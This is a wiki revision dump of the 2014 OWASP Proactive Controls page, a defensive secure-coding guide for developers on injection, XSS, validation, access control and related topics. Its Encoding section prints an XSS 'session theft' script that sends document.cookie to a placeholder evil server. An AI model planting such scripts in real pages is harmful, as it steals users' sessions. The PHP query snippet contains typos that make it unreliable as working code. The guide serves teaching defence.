* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170116OWASP Proactive Controls2014-03-14T14:43:52Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of personal and confidential information in the system that must be protected and tracked. What is the source of this data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170115OWASP Proactive Controls2014-03-14T14:42:49Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
